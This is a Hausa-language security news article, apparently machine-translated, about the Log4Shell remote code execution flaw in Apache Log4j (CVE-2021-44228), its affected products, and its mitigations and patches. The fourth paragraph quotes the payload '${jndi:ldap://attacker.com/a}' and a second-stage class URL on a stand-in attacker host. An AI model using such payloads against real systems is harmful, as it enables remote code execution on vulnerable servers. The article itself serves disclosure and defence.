A cikin Apache Log4j, sanannen tsari don tsara shiga cikin aikace-aikacen Java, an gano wani lahani mai mahimmanci wanda ke ba da damar aiwatar da lambar sabani lokacin da aka tsara ƙima ta musamman a cikin tsarin “{jndi:URL}” ga log ɗin. Ana iya kai harin akan aikace-aikacen Java waɗanda ke tattara ƙimar da aka karɓa daga kafofin waje, alal misali, lokacin nuna ƙimar matsala a cikin saƙonnin kuskure.
An lura cewa kusan dukkanin ayyukan da ke amfani da tsarin kamar Apache Struts, Apache Solr, Apache Druid ko Apache Flink suna fama da matsalar, ciki har da Steam, Apple iCloud, abokan ciniki na Minecraft da sabobin. Ana tsammanin cewa raunin zai iya haifar da tashin hankali na manyan hare-hare akan aikace-aikacen kamfanoni, maimaita tarihin raunin rauni a cikin tsarin Apache Struts, wanda, bisa ga ƙima mai ƙima, ana amfani da shi a cikin aikace-aikacen yanar gizo ta 65% na Fortune. Kamfanoni 100. Ciki har da yunƙurin duba hanyar sadarwar don tsarin marasa ƙarfi.
Matsalar ta kara tsananta saboda gaskiyar cewa an riga an buga wani amfani mai aiki, amma ba a riga an haɗa gyaran gyare-gyare na rassan da ke tsaye ba. Har yanzu ba a sanya mai gano CVE ba. An haɗa gyara kawai a cikin reshen gwajin log4j-2.15.0-rc1. A matsayin hanyar da za a bi don toshe raunin, ana ba da shawarar saita ma'aunin log4j2.formatMsgNoLookups zuwa gaskiya.
Matsalar ta samo asali ne saboda gaskiyar cewa log4j yana goyan bayan sarrafa masarufi na musamman "{}" a cikin layin da aka fitar zuwa log ɗin, wanda a ciki za'a iya aiwatar da tambayoyin JNDI (Java Naming and Directory Interface). Harin ya kai ga wuce kirtani tare da maye gurbin "${jndi:ldap://attacker.com/a}", bayan sarrafa wanda log4j zai aika da buƙatar LDAP don hanyar zuwa ajin Java zuwa uwar garken attacker.com. . Hanyar da uwar garken maharin ya dawo (misali, http://second-stage.attacker.com/Exploit.class) za a loda shi kuma a aiwatar da shi ta hanyar tsarin da ake ciki yanzu, wanda ke baiwa maharin damar aiwatar da lambar sabani akan tsarin tare da haƙƙin aikace-aikacen yanzu.
Ƙara 1: An ba da lahani ga mai gano CVE-2021-44228.
Addendum 2: Hanyar ketare kariyar da aka ƙara ta hanyar saki log4j-2.15.0-rc1 an gano. Wani sabon sabuntawa, log4j-2.15.0-rc2, an gabatar da shi tare da ƙarin cikakkiyar kariya daga rauni. Lambar tana nuna canjin da ke da alaƙa da rashin ƙarewa mara kyau a yanayin amfani da URL ɗin JNDI da ba daidai ba.
source: budenet.ru